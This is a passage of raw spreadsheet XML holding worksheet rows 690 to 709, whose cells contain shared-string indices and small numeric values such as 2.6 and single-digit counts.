      </c>
      <c r="N690" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O690" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P690" s="12" t="s">
        <v>4532</v>
      </c>
      <c r="Q690" s="12">
        <v>2.6</v>
      </c>
      <c r="R690" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S690" s="12" t="s">
        <v>5255</v>
      </c>
      <c r="T690" s="12" t="s">
        <v>4772</v>
      </c>
      <c r="U690" s="12" t="s">
        <v>5256</v>
      </c>
      <c r="V690" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W690" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X690" s="12">
        <v>6</v>
      </c>
      <c r="Y690" s="12" t="s">
        <v>5257</v>
      </c>
    </row>
    <row r="691" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A691" s="12">
        <v>3299</v>
      </c>
      <c r="B691" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C691" s="12" t="s">
        <v>28364</v>
      </c>
      <c r="D691" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F691" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G691" s="12" t="s">
        <v>28369</v>
      </c>
      <c r="H691" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I691" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J691" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K691" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L691" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M691" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N691" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O691" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P691" s="12" t="s">
        <v>5266</v>
      </c>
      <c r="Q691" s="12">
        <v>2.6</v>
      </c>
      <c r="R691" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S691" s="12" t="s">
        <v>5267</v>
      </c>
      <c r="T691" s="12" t="s">
        <v>5268</v>
      </c>
      <c r="U691" s="12" t="s">
        <v>5269</v>
      </c>
      <c r="V691" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W691" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X691" s="12">
        <v>2</v>
      </c>
      <c r="Y691" s="12" t="s">
        <v>5270</v>
      </c>
    </row>
    <row r="692" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A692" s="12">
        <v>3301</v>
      </c>
      <c r="B692" s="12" t="s">
        <v>28931</v>
      </c>
      <c r="D692" s="12" t="s">
        <v>28921</v>
      </c>
      <c r="E692" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F692" s="12" t="s">
        <v>28932</v>
      </c>
      <c r="G692" s="12" t="s">
        <v>5271</v>
      </c>
      <c r="H692" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I692" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J692" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K692" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L692" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M692" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N692" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O692" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P692" s="12" t="s">
        <v>5272</v>
      </c>
      <c r="Q692" s="12">
        <v>2.6</v>
      </c>
      <c r="R692" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S692" s="12" t="s">
        <v>5273</v>
      </c>
      <c r="T692" s="12" t="s">
        <v>3565</v>
      </c>
      <c r="U692" s="12" t="s">
        <v>5274</v>
      </c>
      <c r="V692" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W692" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X692" s="12">
        <v>3</v>
      </c>
      <c r="Y692" s="12" t="s">
        <v>5275</v>
      </c>
    </row>
    <row r="693" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A693" s="12">
        <v>3318</v>
      </c>
      <c r="B693" s="12" t="s">
        <v>28934</v>
      </c>
      <c r="D693" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F693" s="12" t="s">
        <v>28933</v>
      </c>
      <c r="G693" s="12" t="s">
        <v>5285</v>
      </c>
      <c r="H693" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I693" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J693" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K693" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L693" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M693" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N693" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O693" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P693" s="12" t="s">
        <v>5223</v>
      </c>
      <c r="Q693" s="12">
        <v>2.6</v>
      </c>
      <c r="R693" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S693" s="12" t="s">
        <v>5286</v>
      </c>
      <c r="T693" s="12" t="s">
        <v>5287</v>
      </c>
      <c r="U693" s="12" t="s">
        <v>5288</v>
      </c>
      <c r="V693" s="12" t="s">
        <v>1785</v>
      </c>
      <c r="W693" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X693" s="12">
        <v>0</v>
      </c>
      <c r="Y693" s="12" t="s">
        <v>5289</v>
      </c>
    </row>
    <row r="694" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A694" s="12">
        <v>3319</v>
      </c>
      <c r="B694" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D694" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E694" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F694" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G694" s="12" t="s">
        <v>5290</v>
      </c>
      <c r="H694" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I694" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J694" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K694" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L694" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M694" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N694" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O694" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P694" s="12" t="s">
        <v>5291</v>
      </c>
      <c r="Q694" s="12">
        <v>2.6</v>
      </c>
      <c r="R694" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S694" s="12" t="s">
        <v>5292</v>
      </c>
      <c r="T694" s="12" t="s">
        <v>5293</v>
      </c>
      <c r="U694" s="12" t="s">
        <v>5294</v>
      </c>
      <c r="V694" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W694" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X694" s="12">
        <v>35</v>
      </c>
      <c r="Y694" s="12" t="s">
        <v>5295</v>
      </c>
    </row>
    <row r="695" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A695" s="12">
        <v>3321</v>
      </c>
      <c r="B695" s="12" t="s">
        <v>28935</v>
      </c>
      <c r="C695" s="12" t="s">
        <v>28936</v>
      </c>
      <c r="D695" s="12" t="s">
        <v>28932</v>
      </c>
      <c r="F695" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G695" s="12" t="s">
        <v>5296</v>
      </c>
      <c r="H695" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I695" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J695" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K695" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L695" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M695" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N695" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O695" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P695" s="12" t="s">
        <v>5253</v>
      </c>
      <c r="Q695" s="12">
        <v>2.6</v>
      </c>
      <c r="R695" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S695" s="12" t="s">
        <v>5297</v>
      </c>
      <c r="T695" s="12" t="s">
        <v>112</v>
      </c>
      <c r="U695" s="12" t="s">
        <v>5298</v>
      </c>
      <c r="V695" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W695" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X695" s="12">
        <v>1</v>
      </c>
      <c r="Y695" s="12" t="s">
        <v>5299</v>
      </c>
    </row>
    <row r="696" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A696" s="12">
        <v>3327</v>
      </c>
      <c r="B696" s="12" t="s">
        <v>28931</v>
      </c>
      <c r="D696" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="F696" s="12" t="s">
        <v>28937</v>
      </c>
      <c r="G696" s="12" t="s">
        <v>5300</v>
      </c>
      <c r="H696" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I696" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J696" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K696" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L696" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M696" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N696" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O696" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P696" s="12">
        <v>2.6</v>
      </c>
      <c r="Q696" s="12">
        <v>2.6</v>
      </c>
      <c r="R696" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S696" s="12" t="s">
        <v>5301</v>
      </c>
      <c r="T696" s="12" t="s">
        <v>5302</v>
      </c>
      <c r="U696" s="12" t="s">
        <v>5303</v>
      </c>
      <c r="V696" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W696" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X696" s="12">
        <v>5</v>
      </c>
      <c r="Y696" s="12" t="s">
        <v>5304</v>
      </c>
    </row>
    <row r="697" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A697" s="12">
        <v>3328</v>
      </c>
      <c r="B697" s="12" t="s">
        <v>28938</v>
      </c>
      <c r="C697" s="12" t="s">
        <v>28939</v>
      </c>
      <c r="D697" s="12" t="s">
        <v>28940</v>
      </c>
      <c r="F697" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G697" s="12" t="s">
        <v>5305</v>
      </c>
      <c r="H697" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I697" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J697" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K697" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L697" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M697" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N697" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O697" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P697" s="12" t="s">
        <v>5223</v>
      </c>
      <c r="Q697" s="12">
        <v>2.6</v>
      </c>
      <c r="R697" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S697" s="12" t="s">
        <v>5306</v>
      </c>
      <c r="T697" s="12" t="s">
        <v>5307</v>
      </c>
      <c r="U697" s="12" t="s">
        <v>5308</v>
      </c>
      <c r="V697" s="12" t="s">
        <v>5309</v>
      </c>
      <c r="W697" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X697" s="12">
        <v>2</v>
      </c>
      <c r="Y697" s="12" t="s">
        <v>5310</v>
      </c>
    </row>
    <row r="698" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A698" s="12">
        <v>3333</v>
      </c>
      <c r="B698" s="12" t="s">
        <v>28931</v>
      </c>
      <c r="D698" s="12" t="s">
        <v>28941</v>
      </c>
      <c r="E698" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F698" s="12" t="s">
        <v>28921</v>
      </c>
      <c r="G698" s="12" t="s">
        <v>5312</v>
      </c>
      <c r="H698" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I698" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J698" s="12" t="s">
        <v>963</v>
      </c>
      <c r="K698" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L698" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M698" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N698" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O698" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P698" s="12" t="s">
        <v>5313</v>
      </c>
      <c r="Q698" s="12">
        <v>2.6</v>
      </c>
      <c r="R698" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S698" s="12" t="s">
        <v>5314</v>
      </c>
      <c r="T698" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U698" s="12" t="s">
        <v>5315</v>
      </c>
      <c r="V698" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W698" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X698" s="12">
        <v>6</v>
      </c>
      <c r="Y698" s="12" t="s">
        <v>5316</v>
      </c>
    </row>
    <row r="699" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A699" s="12">
        <v>3334</v>
      </c>
      <c r="B699" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C699" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D699" s="12" t="s">
        <v>28918</v>
      </c>
      <c r="F699" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G699" s="12" t="s">
        <v>5317</v>
      </c>
      <c r="H699" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I699" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J699" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K699" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L699" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M699" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N699" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O699" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P699" s="12" t="s">
        <v>5253</v>
      </c>
      <c r="Q699" s="12">
        <v>2.6</v>
      </c>
      <c r="R699" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S699" s="12" t="s">
        <v>5318</v>
      </c>
      <c r="T699" s="12" t="s">
        <v>5319</v>
      </c>
      <c r="U699" s="12" t="s">
        <v>5320</v>
      </c>
      <c r="V699" s="12" t="s">
        <v>1881</v>
      </c>
      <c r="W699" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X699" s="12">
        <v>5</v>
      </c>
      <c r="Y699" s="12" t="s">
        <v>5321</v>
      </c>
    </row>
    <row r="700" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A700" s="12">
        <v>3336</v>
      </c>
      <c r="B700" s="12" t="s">
        <v>28942</v>
      </c>
      <c r="D700" s="12" t="s">
        <v>28943</v>
      </c>
      <c r="E700" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F700" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G700" s="12" t="s">
        <v>5322</v>
      </c>
      <c r="H700" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I700" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J700" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K700" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L700" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M700" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N700" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O700" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P700" s="12" t="s">
        <v>5223</v>
      </c>
      <c r="Q700" s="12">
        <v>2.6</v>
      </c>
      <c r="R700" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S700" s="12" t="s">
        <v>5323</v>
      </c>
      <c r="T700" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="U700" s="12" t="s">
        <v>4175</v>
      </c>
      <c r="V700" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W700" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X700" s="12">
        <v>2</v>
      </c>
      <c r="Y700" s="12" t="s">
        <v>5324</v>
      </c>
    </row>
    <row r="701" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A701" s="12">
        <v>3349</v>
      </c>
      <c r="B701" s="12" t="s">
        <v>28931</v>
      </c>
      <c r="D701" s="12" t="s">
        <v>28944</v>
      </c>
      <c r="E701" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F701" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G701" s="12" t="s">
        <v>5331</v>
      </c>
      <c r="H701" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I701" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J701" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K701" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L701" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M701" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N701" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O701" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P701" s="12" t="s">
        <v>5210</v>
      </c>
      <c r="Q701" s="12">
        <v>2.6</v>
      </c>
      <c r="R701" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S701" s="12" t="s">
        <v>5332</v>
      </c>
      <c r="T701" s="12" t="s">
        <v>5333</v>
      </c>
      <c r="U701" s="12" t="s">
        <v>5334</v>
      </c>
      <c r="V701" s="12" t="s">
        <v>5335</v>
      </c>
      <c r="W701" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X701" s="12">
        <v>2</v>
      </c>
      <c r="Y701" s="12" t="s">
        <v>5336</v>
      </c>
    </row>
    <row r="702" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A702" s="12">
        <v>3351</v>
      </c>
      <c r="B702" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C702" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D702" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E702" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F702" s="12" t="s">
        <v>28945</v>
      </c>
      <c r="G702" s="12" t="s">
        <v>5337</v>
      </c>
      <c r="H702" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I702" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J702" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K702" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L702" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M702" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N702" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O702" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P702" s="12" t="s">
        <v>5210</v>
      </c>
      <c r="Q702" s="12">
        <v>2.6</v>
      </c>
      <c r="R702" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S702" s="12" t="s">
        <v>5338</v>
      </c>
      <c r="T702" s="12" t="s">
        <v>5333</v>
      </c>
      <c r="U702" s="12" t="s">
        <v>5339</v>
      </c>
      <c r="V702" s="12" t="s">
        <v>5335</v>
      </c>
      <c r="W702" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X702" s="12">
        <v>2</v>
      </c>
      <c r="Y702" s="12" t="s">
        <v>5340</v>
      </c>
    </row>
    <row r="703" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A703" s="12">
        <v>3354</v>
      </c>
      <c r="B703" s="12" t="s">
        <v>28946</v>
      </c>
      <c r="D703" s="12" t="s">
        <v>28937</v>
      </c>
      <c r="F703" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G703" s="12" t="s">
        <v>5341</v>
      </c>
      <c r="H703" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I703" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J703" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K703" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L703" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M703" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N703" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O703" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P703" s="12" t="s">
        <v>5342</v>
      </c>
      <c r="Q703" s="12">
        <v>2.6</v>
      </c>
      <c r="R703" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S703" s="12" t="s">
        <v>5343</v>
      </c>
      <c r="T703" s="12" t="s">
        <v>5344</v>
      </c>
      <c r="U703" s="12" t="s">
        <v>5345</v>
      </c>
      <c r="V703" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W703" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X703" s="12">
        <v>6</v>
      </c>
      <c r="Y703" s="12" t="s">
        <v>5346</v>
      </c>
    </row>
    <row r="704" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A704" s="12">
        <v>3355</v>
      </c>
      <c r="B704" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C704" s="12" t="s">
        <v>28363</v>
      </c>
      <c r="D704" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F704" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G704" s="12" t="s">
        <v>5347</v>
      </c>
      <c r="H704" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I704" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J704" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K704" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L704" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M704" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N704" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O704" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P704" s="12" t="s">
        <v>5210</v>
      </c>
      <c r="Q704" s="12">
        <v>2.6</v>
      </c>
      <c r="R704" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S704" s="12" t="s">
        <v>5348</v>
      </c>
      <c r="T704" s="12" t="s">
        <v>39</v>
      </c>
      <c r="U704" s="12" t="s">
        <v>5349</v>
      </c>
      <c r="V704" s="12" t="s">
        <v>39</v>
      </c>
      <c r="W704" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X704" s="12">
        <v>1</v>
      </c>
      <c r="Y704" s="12" t="s">
        <v>5350</v>
      </c>
    </row>
    <row r="705" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A705" s="12">
        <v>3358</v>
      </c>
      <c r="B705" s="12" t="s">
        <v>28947</v>
      </c>
      <c r="D705" s="12" t="s">
        <v>28941</v>
      </c>
      <c r="E705" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F705" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="G705" s="12" t="s">
        <v>5351</v>
      </c>
      <c r="H705" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I705" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J705" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K705" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L705" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M705" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N705" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O705" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P705" s="12" t="s">
        <v>5210</v>
      </c>
      <c r="Q705" s="12">
        <v>2.6</v>
      </c>
      <c r="R705" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S705" s="12" t="s">
        <v>5352</v>
      </c>
      <c r="T705" s="12" t="s">
        <v>4104</v>
      </c>
      <c r="U705" s="12" t="s">
        <v>5353</v>
      </c>
      <c r="V705" s="12" t="s">
        <v>3399</v>
      </c>
      <c r="W705" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X705" s="12">
        <v>21</v>
      </c>
      <c r="Y705" s="12" t="s">
        <v>5354</v>
      </c>
    </row>
    <row r="706" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A706" s="12">
        <v>3362</v>
      </c>
      <c r="B706" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D706" s="12" t="s">
        <v>28948</v>
      </c>
      <c r="F706" s="12" t="s">
        <v>28948</v>
      </c>
      <c r="G706" s="12" t="s">
        <v>5361</v>
      </c>
      <c r="H706" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I706" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J706" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K706" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L706" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M706" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N706" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O706" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P706" s="12" t="s">
        <v>5362</v>
      </c>
      <c r="Q706" s="12">
        <v>2.6</v>
      </c>
      <c r="R706" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S706" s="12" t="s">
        <v>5363</v>
      </c>
      <c r="T706" s="12" t="s">
        <v>117</v>
      </c>
      <c r="U706" s="12" t="s">
        <v>5364</v>
      </c>
      <c r="V706" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W706" s="12">
        <v>3755</v>
      </c>
      <c r="X706" s="12">
        <v>1</v>
      </c>
      <c r="Y706" s="12" t="s">
        <v>5365</v>
      </c>
    </row>
    <row r="707" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A707" s="12">
        <v>3376</v>
      </c>
      <c r="B707" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C707" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D707" s="12" t="s">
        <v>29800</v>
      </c>
      <c r="F707" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G707" s="12" t="s">
        <v>5366</v>
      </c>
      <c r="H707" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I707" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J707" s="12" t="s">
        <v>1476</v>
      </c>
      <c r="K707" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L707" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M707" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N707" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O707" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P707" s="12" t="s">
        <v>5367</v>
      </c>
      <c r="Q707" s="12">
        <v>2.6</v>
      </c>
      <c r="R707" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S707" s="12" t="s">
        <v>5368</v>
      </c>
      <c r="T707" s="12" t="s">
        <v>5369</v>
      </c>
      <c r="U707" s="12" t="s">
        <v>5370</v>
      </c>
      <c r="V707" s="12" t="s">
        <v>1881</v>
      </c>
      <c r="W707" s="12" t="s">
        <v>5371</v>
      </c>
      <c r="X707" s="12">
        <v>4</v>
      </c>
      <c r="Y707" s="12" t="s">
        <v>5372</v>
      </c>
    </row>
    <row r="708" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A708" s="12">
        <v>3382</v>
      </c>
      <c r="B708" s="12" t="s">
        <v>28950</v>
      </c>
      <c r="C708" s="12" t="s">
        <v>28951</v>
      </c>
      <c r="D708" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F708" s="12" t="s">
        <v>28952</v>
      </c>
      <c r="G708" s="12" t="s">
        <v>5373</v>
      </c>
      <c r="H708" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I708" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J708" s="12" t="s">
        <v>1314</v>
      </c>
      <c r="K708" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L708" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M708" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N708" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O708" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P708" s="12" t="s">
        <v>5223</v>
      </c>
      <c r="Q708" s="12">
        <v>2.6</v>
      </c>
      <c r="R708" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S708" s="12" t="s">
        <v>5374</v>
      </c>
      <c r="T708" s="12" t="s">
        <v>5375</v>
      </c>
      <c r="U708" s="12" t="s">
        <v>5376</v>
      </c>
      <c r="V708" s="12" t="s">
        <v>1881</v>
      </c>
      <c r="W708" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X708" s="12">
        <v>1</v>
      </c>
      <c r="Y708" s="12" t="s">
        <v>5377</v>
      </c>
    </row>
    <row r="709" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A709" s="12">
        <v>3383</v>
      </c>
      <c r="B709" s="12" t="s">
        <v>28934</v>
      </c>
      <c r="D709" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F709" s="12" t="s">
        <v>28953</v>
      </c>
      <c r="G709" s="12" t="s">
        <v>5378</v>
      </c>
      <c r="H709" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I709" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J709" s="12" t="s">
        <v>591</v>
      </c>
      <c r="K709" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L709" s="12" t="s">
        <v>16</v>
      </c>
